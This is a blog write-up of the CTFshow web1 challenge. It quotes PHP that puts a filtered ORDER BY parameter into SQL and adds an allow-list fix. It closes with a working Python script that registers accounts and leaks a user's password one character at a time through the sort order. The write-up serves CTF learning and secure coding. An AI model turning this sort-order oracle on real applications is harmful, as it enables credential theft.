Rock's blog

Interest is the best teacher


Write-Up for CTFshow web1

I first tested by hand but did not come up with any ideas.

Then I figured the source code might be available, and a directory scan turned up www.zip.

Reading through the source, I found that user-submitted data is filtered strictly; quotes in particular are filtered out, so injection cannot be achieved.

The entry point should be user_main.php.

```php
<?php

if(isset($_SESSION["login"]) && $_SESSION["login"] === true){
    $con = mysqli_connect("localhost","root","root","web15");
    if (!$con)
    {
        die('Could not connect: ' . mysqli_error());
    }
    $order=$_GET['order'];
    // Only values shorter than 6 characters pass, and a keyword/symbol blacklist is
    // applied; a bare column name such as "pwd" survives both checks and is then
    // interpolated directly into the ORDER BY clause.
    if(isset($order) && strlen($order)<6){
        if(preg_match("/group|union|select|from|or|and|regexp|substr|like|create|drop|\,|\`|\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\’|\“|\"|\<|\>|\?|\,|\.|\?/i",$order)){
            die("error");
        }
        $sql="select * from user order by $order";
    }else{
        $sql="select * from user order by id";
    }
    // Closing brace of the login check; the rest of the file (running the query and
    // rendering the user table) is not part of this excerpt.
}
?>
```

Since the challenge allows sorting via ORDER BY, sorting on the password column lets us infer which character sits at each position of the password.
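The weakness above is that a blacklist decides what may reach ORDER BY, and the bare column name `pwd` is not on it. Sorting by a column leaks its contents through the row order even when the column itself is never displayed, so the fix is to stop user input from reaching the SQL at all. The following is an added example of how user_main.php could be written with an allow-list; it is not the challenge's code or the write-up's. The column names `id` and `pwd` come from the challenge, `username` is assumed from the registration form, and the database credentials are placeholders.

```php
<?php
// Added example, not the challenge's source: allow-listed ORDER BY handling for
// user_main.php. The request value is only ever used as a lookup key; the SQL
// fragment that ends up in the query is a fixed string chosen by the server.

declare(strict_types=1);

// The only orderings the page offers. Keys are what the client may send, values
// are the literal SQL used. The secret column (pwd) is deliberately absent, so it
// can never become a sort key.
const ALLOWED_ORDER = [
    'id'       => '`id` ASC',
    'username' => '`username` ASC',   // column name assumed from the reg form
];

/**
 * Map the raw ?order= value to a safe ORDER BY fragment.
 * Unknown, empty or missing values fall back to the default ordering instead
 * of being rejected with a distinguishable error.
 */
function safe_order_clause(?string $requested): string
{
    if ($requested !== null && array_key_exists($requested, ALLOWED_ORDER)) {
        return ALLOWED_ORDER[$requested];
    }
    return ALLOWED_ORDER['id'];
}

if (isset($_SESSION['login']) && $_SESSION['login'] === true) {
    // Placeholder credentials; the challenge used a local root account.
    $con = mysqli_connect('localhost', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', 'web15');
    if (!$con) {
        die('Could not connect: ' . mysqli_connect_error());
    }

    $orderClause = safe_order_clause($_GET['order'] ?? null);

    // Select only the columns the page needs; pwd is neither returned nor sortable.
    $sql    = "SELECT `id`, `username` FROM `user` ORDER BY $orderClause";
    $result = mysqli_query($con, $sql);
    if ($result === false) {
        die('Query failed');
    }
    while ($row = mysqli_fetch_assoc($result)) {
        echo htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8'), "<br>\n";
    }
    mysqli_close($con);
}
?>
```

Prepared statements cannot bind identifiers such as column names, which is why an allow-list of fixed fragments is the standard defence for ORDER BY. Keeping the secret column out of the allow-list (and out of the SELECT list) closes both the sort-order oracle used in this write-up and any direct display of the value.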

```python
import requests
import hashlib

url = "http://69f3d937-7341-4f28-b8e6-fdca3b1a2727.challenge.ctf.show/"


def reg(password):
    # Register a throwaway account whose username and password are both `password`.
    # reg.php answers with a 302 redirect when registration succeeds.
    data = {"username": password, "email": "1", "nickname": "1", "password": password}
    r = requests.post(url=url + "reg.php", data=data, allow_redirects=False)
    return r.status_code == 302


def login(username, password):
    # proxy = {"http": "http://127.0.0.1:8080"}
    # login.php expects the MD5 of the password; a successful login redirects to user_main.php.
    data = {"username": username, "password": hashlib.md5(password.encode()).hexdigest()}
    s = requests.session()
    r = s.post(url=url + "login.php", data=data, allow_redirects=False)
    # print(r.headers)
    if r.headers.get("location") == "/user_main.php?order=id":
        return s
    print("login error!")
    return None


# Candidate characters in ascending collation order; the oracle relies on this order.
key = "-.0123456789:abcdefghijklmnopqrstuvwxyz{|}~"
reg(hashlib.md5("check".encode()).hexdigest())
session = login(hashlib.md5("check".encode()).hexdigest(), "check")
pwd = ["-"] * 100
for i in range(len(pwd)):
    for x in range(len(key)):
        pwd[i] = key[x]
        _pwd = "".join(pwd)
        if reg(_pwd):
            # Sort the user list by the pwd column and look at the rows listed
            # after the flag user.
            r = session.get(url=url + "user_main.php?order=pwd")
            if _pwd in r.text.split("flag_is_my_password")[1]:
                if x == 0:
                    # Even the smallest candidate sorts after the flag, so the flag
                    # has no character at this position: it is complete.
                    pwd[i] = ""
                    break
                # Our guess sorts after the flag, so the flag's character at this
                # position is the previous candidate.
                pwd[i] = key[x - 1]
                print("".join(pwd))
                break
    if pwd[i] == "":
        break
```